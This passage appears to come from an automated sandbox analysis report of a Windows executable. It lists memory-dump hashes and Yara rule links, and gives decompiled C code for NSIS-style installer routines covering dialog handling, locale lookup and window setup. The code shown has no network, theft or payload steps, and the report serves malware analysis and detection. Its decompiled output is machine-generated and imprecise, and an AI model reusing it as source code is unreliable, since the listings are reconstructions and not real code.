                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: 717546484d7fa15b747944a954efadbd86ff467de9880ad1bb9a4d2a07532cdb
                                                                                                  • Instruction ID: a6a563213af65dfa629204f33aebea20412d031b043e3e21e0a0d93577fd57dd
                                                                                                  • Opcode Fuzzy Hash: 717546484d7fa15b747944a954efadbd86ff467de9880ad1bb9a4d2a07532cdb
                                                                                                  • Instruction Fuzzy Hash: 34F0A0325081049EE702EBA89A499FEB3A8DB11328F60457BE101B21C1C6B849469B3A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 100049BB, Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                                  • Instruction ID: ea6d95bd45ea6168f5f02e08316e1d26d9486249a032367c08c2a81a8b901b3c
                                                                                                  • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                                  • Instruction Fuzzy Hash: E0014D79A10248EFDB40DF98C58099DBBF4FB08360F1285A6ED08E7725E730AE509B44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 100047B8, Relevance: .0, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                                  • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                                  • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                                  • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00403B0D, Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 84%
                                                                                                  			E00403B0D(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x79ed84 = _t35;
					if(_t115 == 0x110) {
						 *0x7a27a8 = _t125;
						 *0x79ed98 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79dd60 = _t91;
						E00403FE0(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x7a1f88);
						 *0x7a1f6c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x79ed84 = 1;
					}
					_t122 =  *0x4091cc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x7a27c0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E0040402C(0x40b);
						while(1) {
							_t37 =  *0x79ed84;
							 *0x4091cc =  *0x4091cc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091cc; // 0xffffffff
							__eflags = _t39 -  *0x7a27c4;
							if(_t39 ==  *0x7a27c4) {
								E0040140B(1);
							}
							__eflags =  *0x7a1f6c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x4091cc -  *0x7a27c4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D46(_t116, _t125, _t130, 0x7aa800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FE0(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FE0(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FE0(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x7a282c - _t133;
							_v32 = _t49;
							if( *0x7a282c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00404002(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x79dd60, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x7a282c - _t133;
							if( *0x7a282c == _t133) {
								_push( *0x79ed98);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x79dd60);
							}
							E00404015();
							E00405D24(0x79eda0, 0x7a1fa0);
							E00405D46(0x79eda0, _t125, _t130,  &(0x79eda0[lstrlenA(0x79eda0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x79eda0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x7a1f78);
									 *0x79e570 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x7a27a0,  *_t130 +  *0x7a1f80 & 0x0000ffff, _t125,  *(0x4091d0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x7a1f78 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FE0(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x7a1f78, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x7a1f6c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x7a1f78, 8);
									E0040402C(0x405);
									goto L58;
								}
								__eflags =  *0x7a282c - _t133;
								if( *0x7a282c != _t133) {
									goto L61;
								}
								__eflags =  *0x7a2820 - _t133;
								if( *0x7a2820 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a1f78);
						 *0x7a27a8 = _t133;
						EndDialog(_t125,  *0x79e168);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x7a1f78, 0x40f, 0, 1);
						__eflags =  *0x7a1f6c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x79ed78, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79ed78,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00404047(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x7a1f78, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a282c - _t133;
										if( *0x7a282c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x79e168 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FB9();
											goto L26;
										}
										E0040140B(_t127);
										 *0x79e168 = _t127;
										goto L21;
									}
									__eflags =  *0x4091cc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x7a1f78);
						 *0x7a1f78 = _a12;
						L58:
						if( *0x79fda0 == _t133) {
							_t142 =  *0x7a1f78 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x79fda0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                  0x00403b16
                                                                                                  0x00403b1f
                                                                                                  0x00403c60
                                                                                                  0x00403c64
                                                                                                  0x00403c68
                                                                                                  0x00403c6a
                                                                                                  0x00403c6f
                                                                                                  0x00403c7a
                                                                                                  0x00403c85
                                                                                                  0x00403c8a
                                                                                                  0x00403c8c
                                                                                                  0x00403c8e
                                                                                                  0x00403c91
                                                                                                  0x00403c96
                                                                                                  0x00403ca4
                                                                                                  0x00403cb1
                                                                                                  0x00403cb8
                                                                                                  0x00403cb8
                                                                                                  0x00403cb9
                                                                                                  0x00403cb9
                                                                                                  0x00403cbe
                                                                                                  0x00403cc4
                                                                                                  0x00403ccb
                                                                                                  0x00403cd1
                                                                                                  0x00403cd3
                                                                                                  0x00403d13
                                                                                                  0x00403d18
                                                                                                  0x00403d1d
                                                                                                  0x00403d1d
                                                                                                  0x00403d22
                                                                                                  0x00403d2b
                                                                                                  0x00403d2d
                                                                                                  0x00403d32
                                                                                                  0x00403d38
                                                                                                  0x00403d3c
                                                                                                  0x00403d3c
                                                                                                  0x00403d41
                                                                                                  0x00403d47
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403d52
                                                                                                  0x00403d58
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403d61
                                                                                                  0x00403d69
                                                                                                  0x00403d6e
                                                                                                  0x00403d71
                                                                                                  0x00403d77
                                                                                                  0x00403d7c
                                                                                                  0x00403d7f
                                                                                                  0x00403d85
                                                                                                  0x00403d8a
                                                                                                  0x00403d8d
                                                                                                  0x00403d93
                                                                                                  0x00403d9b
                                                                                                  0x00403da1
                                                                                                  0x00403da7
                                                                                                  0x00403dab
                                                                                                  0x00403db2
                                                                                                  0x00403db2
                                                                                                  0x00403db2
                                                                                                  0x00403dbc
                                                                                                  0x00403dce
                                                                                                  0x00403dda
                                                                                                  0x00403ddf
                                                                                                  0x00403de9
                                                                                                  0x00403def
                                                                                                  0x00403df1
                                                                                                  0x00403df6
                                                                                                  0x00403df3
                                                                                                  0x00403df3
                                                                                                  0x00403df3
                                                                                                  0x00403e06
                                                                                                  0x00403e1e
                                                                                                  0x00403e20
                                                                                                  0x00403e26
                                                                                                  0x00403e3b
                                                                                                  0x00403e28
                                                                                                  0x00403e31
                                                                                                  0x00403e33
                                                                                                  0x00403e33
                                                                                                  0x00403e41
                                                                                                  0x00403e51
                                                                                                  0x00403e62
                                                                                                  0x00403e69
                                                                                                  0x00403e6f
                                                                                                  0x00403e73
                                                                                                  0x00403e78
                                                                                                  0x00403e7a
                                                                                                  0x00000000
                                                                                                  0x00403e80
                                                                                                  0x00403e80
                                                                                                  0x00403e82
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403e88
                                                                                                  0x00403e8c
                                                                                                  0x00403eb1
                                                                                                  0x00403eb7
                                                                                                  0x00403ebd
                                                                                                  0x00403ebf
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403ee5
                                                                                                  0x00403eeb
                                                                                                  0x00403eed
                                                                                                  0x00403ef2
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403ef8
                                                                                                  0x00403efb
                                                                                                  0x00403efe
                                                                                                  0x00403f15
                                                                                                  0x00403f21
                                                                                                  0x00403f3a
                                                                                                  0x00403f40
                                                                                                  0x00403f44
                                                                                                  0x00403f49
                                                                                                  0x00403f4f
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403f59
                                                                                                  0x00403f64
                                                                                                  0x00000000
                                                                                                  0x00403f64
                                                                                                  0x00403e8e
                                                                                                  0x00403e94
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403e9a
                                                                                                  0x00403ea0
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403ea6
                                                                                                  0x00403e7a
                                                                                                  0x00403f71
                                                                                                  0x00403f7d
                                                                                                  0x00403f84
                                                                                                  0x00000000
                                                                                                  0x00403cd5
                                                                                                  0x00403cd5
                                                                                                  0x00403cd8
                                                                                                  0x00403d0b
                                                                                                  0x00403d0b
                                                                                                  0x00403d0d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403d0d
                                                                                                  0x00403cda
                                                                                                  0x00403cde
                                                                                                  0x00403ce3
                                                                                                  0x00403ce5
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403cf5
                                                                                                  0x00403cfd
                                                                                                  0x00000000
                                                                                                  0x00403d03
                                                                                                  0x00403b31
                                                                                                  0x00403b31
                                                                                                  0x00403b35
                                                                                                  0x00403b3a
                                                                                                  0x00403b49
                                                                                                  0x00403b49
                                                                                                  0x00403b52
                                                                                                  0x00403b5b
                                                                                                  0x00403b66
                                                                                                  0x00403b66
                                                                                                  0x00403b72
                                                                                                  0x00403b8e
                                                                                                  0x00403b91
                                                                                                  0x00403ba4
                                                                                                  0x00403baa
                                                                                                  0x00403c4d
                                                                                                  0x00000000
                                                                                                  0x00403c56
                                                                                                  0x00403bb0
                                                                                                  0x00403bbd
                                                                                                  0x00403bbf
                                                                                                  0x00403bc1
                                                                                                  0x00403be0
                                                                                                  0x00403be0
                                                                                                  0x00403be3
                                                                                                  0x00403be8
                                                                                                  0x00403beb
                                                                                                  0x00403bfb
                                                                                                  0x00403bfc
                                                                                                  0x00403bfe
                                                                                                  0x00403c34
                                                                                                  0x00403c47
                                                                                                  0x00000000
                                                                                                  0x00403c47
                                                                                                  0x00403c00
                                                                                                  0x00403c06
                                                                                                  0x00403c1f
                                                                                                  0x00403c24
                                                                                                  0x00403c26
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403c28
                                                                                                  0x00403c14
                                                                                                  0x00403c14
                                                                                                  0x00403c16
                                                                                                  0x00403c16
                                                                                                  0x00000000
                                                                                                  0x00403c16
                                                                                                  0x00403c09
                                                                                                  0x00403c0e
                                                                                                  0x00000000
                                                                                                  0x00403c0e
                                                                                                  0x00403bed
                                                                                                  0x00403bf3
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403bf5
                                                                                                  0x00000000
                                                                                                  0x00403bf5
                                                                                                  0x00403be5
                                                                                                  0x00000000
                                                                                                  0x00403be5
                                                                                                  0x00403bcb
                                                                                                  0x00403bd2
                                                                                                  0x00403bd8
                                                                                                  0x00403bda
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403bda
                                                                                                  0x00403b96
                                                                                                  0x00000000
                                                                                                  0x00403b74
                                                                                                  0x00403b7a
                                                                                                  0x00403b84
                                                                                                  0x00403f8a
                                                                                                  0x00403f90
                                                                                                  0x00403f92
                                                                                                  0x00403f98
                                                                                                  0x00403f9d
                                                                                                  0x00403fa3
                                                                                                  0x00403fa3
                                                                                                  0x00403f98
                                                                                                  0x00403fad
                                                                                                  0x00000000
                                                                                                  0x00403fad
                                                                                                  0x00403b72

                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B49
                                                                                                  • ShowWindow.USER32(?), ref: 00403B66
                                                                                                  • DestroyWindow.USER32 ref: 00403B7A
                                                                                                  • SetWindowLongA.USER32 ref: 00403B96
                                                                                                  • GetDlgItem.USER32 ref: 00403BB7
                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BCB
                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403BD2
                                                                                                  • GetDlgItem.USER32 ref: 00403C80
                                                                                                  • GetDlgItem.USER32 ref: 00403C8A
                                                                                                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403CA4
                                                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CF5
                                                                                                  • GetDlgItem.USER32 ref: 00403D9B
                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403DBC
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403DCE
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403DE9
                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DFF
                                                                                                  • EnableMenuItem.USER32 ref: 00403E06
                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E1E
                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E31
                                                                                                  • lstrlenA.KERNEL32(0079EDA0,?,0079EDA0,007A1FA0), ref: 00403E5A
                                                                                                  • SetWindowTextA.USER32(?,0079EDA0), ref: 00403E69
                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403F9D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 184305955-0
                                                                                                  • Opcode ID: 711034cc0416762a8bb21ed1dd30b11ec8ca8cd0f2e427e3bab098090aeff2ca
                                                                                                  • Instruction ID: 50bbb195071ba9e6e5512fce667893bd854c38d79f7330084b3933dc81b42d7b
                                                                                                  • Opcode Fuzzy Hash: 711034cc0416762a8bb21ed1dd30b11ec8ca8cd0f2e427e3bab098090aeff2ca
                                                                                                  • Instruction Fuzzy Hash: 87C18F71904205AFEB216F61ED85E2A3ABCEB85706F00453FF601B51E1C73DA942DB6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00403777, Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 96%
                                                                                                  			E00403777(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x7a27b0;
				_t20 = E004060B4(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x79eda0;
					"1033" = 0x7830;
					E00405C0B(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79eda0, 0);
					__eflags =  *0x79eda0;
					if(__eflags == 0) {
						E00405C0B(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x79eda0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405C82("1033",  *_t20() & 0x0000ffff);
				}
				E00403A40(_t76, _t88);
				 *0x7a2820 =  *0x7a27b8 & 0x00000020;
				 *0x7a283c = 0x10000;
				if(E004058F8(_t88, 0x7a8400) != 0) {
					L16:
					if(E004058F8(_t96, 0x7a8400) == 0) {
						E00405D46(0, _t79, _t81, 0x7a8400,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x7a27a0, 0x67, 1, 0, 0, 0x8040);
					 *0x7a1f88 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403A40(_t76, __eflags);
							__eflags =  *0x7a2840;
							if( *0x7a2840 != 0) {
								_t31 = E004050E2(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a1f6c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x79ed78, 5);
							_t37 = E00406046("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E00406046("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x7a1f40);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7a1f40);
								 *0x7a1f64 = _t85;
								RegisterClassA(0x7a1f40);
							}
							_t39 =  *0x7a1f80; // 0x0
							_t42 = DialogBoxParamA( *0x7a27a0, _t39 + 0x00000069 & 0x0000ffff, 0, E00403B0D, 0);
							E004036C7(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x7a27a0;
						 *0x7a1f54 = _t28;
						_v20 = 0x624e5f;
						 *0x7a1f44 = E00401000;
						 *0x7a1f50 =  *0x7a27a0;
						 *0x7a1f64 =  &_v20;
						if(RegisterClassA(0x7a1f40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79ed78 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a27a0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x7a1740;
					E00405C0B( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x7a27d8, 0x7a1740, 0);
					_t62 =  *0x7a1740; // 0x48
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x7a1741;
						 *((char*)(E00405842(0x7a1741, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405D24(0x7a8400, E00405817(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E0040585E(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                                                                  0x0040377d
                                                                                                  0x00403786
                                                                                                  0x0040378d
                                                                                                  0x0040378f
                                                                                                  0x004037a3
                                                                                                  0x004037b5
                                                                                                  0x004037bf
                                                                                                  0x004037c4
                                                                                                  0x004037ca
                                                                                                  0x004037dd
                                                                                                  0x004037dd
                                                                                                  0x004037e8
                                                                                                  0x00403791
                                                                                                  0x0040379c
                                                                                                  0x0040379c
                                                                                                  0x004037ed
                                                                                                  0x00403800
                                                                                                  0x00403805
                                                                                                  0x00403816
                                                                                                  0x0040389d
                                                                                                  0x004038a5
                                                                                                  0x004038ae
                                                                                                  0x004038ae
                                                                                                  0x004038c4
                                                                                                  0x004038ca
                                                                                                  0x004038d8
                                                                                                  0x00403967
                                                                                                  0x0040396f
                                                                                                  0x00403979
                                                                                                  0x0040397e
                                                                                                  0x00403984
                                                                                                  0x00403a0e
                                                                                                  0x00403a13
                                                                                                  0x00403a15
                                                                                                  0x00403a31
                                                                                                  0x00000000
                                                                                                  0x00403a31
                                                                                                  0x00403a17
                                                                                                  0x00403a1d
                                                                                                  0x00403a25
                                                                                                  0x00403a25
                                                                                                  0x00000000
                                                                                                  0x00403a1d
                                                                                                  0x00403992
                                                                                                  0x0040399d
                                                                                                  0x004039a2
                                                                                                  0x004039a4
                                                                                                  0x004039ab
                                                                                                  0x004039ab
                                                                                                  0x004039b6
                                                                                                  0x004039be
                                                                                                  0x004039c0
                                                                                                  0x004039c2
                                                                                                  0x004039cb
                                                                                                  0x004039ce
                                                                                                  0x004039d4
                                                                                                  0x004039d4
                                                                                                  0x004039da
                                                                                                  0x004039f3
                                                                                                  0x00403a04
                                                                                                  0x00000000
                                                                                                  0x00403a09
                                                                                                  0x00403971
                                                                                                  0x00403973
                                                                                                  0x00000000
                                                                                                  0x004038de
                                                                                                  0x004038de
                                                                                                  0x004038e4
                                                                                                  0x004038ee
                                                                                                  0x004038f6
                                                                                                  0x00403900
                                                                                                  0x00403906
                                                                                                  0x00403914
                                                                                                  0x00403a36
                                                                                                  0x00403a36
                                                                                                  0x00000000
                                                                                                  0x00403a36
                                                                                                  0x0040391a
                                                                                                  0x00403923
                                                                                                  0x00403962
                                                                                                  0x00000000
                                                                                                  0x00403962
                                                                                                  0x0040381c
                                                                                                  0x0040381c
                                                                                                  0x00403821
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040382b
                                                                                                  0x0040383b
                                                                                                  0x00403840
                                                                                                  0x00403847
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040384b
                                                                                                  0x0040384d
                                                                                                  0x0040385a
                                                                                                  0x0040385a
                                                                                                  0x00403862
                                                                                                  0x00403868
                                                                                                  0x00403890
                                                                                                  0x00403898
                                                                                                  0x00000000
                                                                                                  0x0040387a
                                                                                                  0x0040387b
                                                                                                  0x00403884
                                                                                                  0x0040388a
                                                                                                  0x0040388b
                                                                                                  0x00000000
                                                                                                  0x0040388b
                                                                                                  0x00403886
                                                                                                  0x00403888
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403888
                                                                                                  0x00403868

                                                                                                  APIs
